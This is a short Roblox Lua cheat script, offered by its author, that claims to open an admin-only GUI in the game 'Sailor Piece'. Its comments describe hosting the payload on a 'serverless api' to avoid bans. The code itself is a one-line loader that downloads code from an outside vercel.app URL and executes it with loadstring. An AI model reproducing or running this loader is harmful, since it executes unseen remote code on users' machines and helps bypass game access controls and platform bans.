-- [[ -- This opens a gui in sailor piece that was intended for Admins -- If you get errors then DM me on cord "_theduece" (send a friend request) -- My website is https://saiscripts.vercel.app/ (easier way to get my scripts and anything else) and YT: https://www.youtube.com/@its-skondo -- -- Author: Sai -- License: none -- Version: "v.00000" -- Discord: https://discord.gg/6Q92t8b6cn -- ]] -- NOTE: you probably will have to hook the remote events to allow you to actually use it -- **created a serverless api so no more banning, my old github got banned** if not game:IsLoaded() then repeat task.wait() until game:IsLoaded() end pcall(function() loadstring(game:HttpGet( "https://permanentdatabase.vercel.app/api/load?name=sailoradmin" ))() end)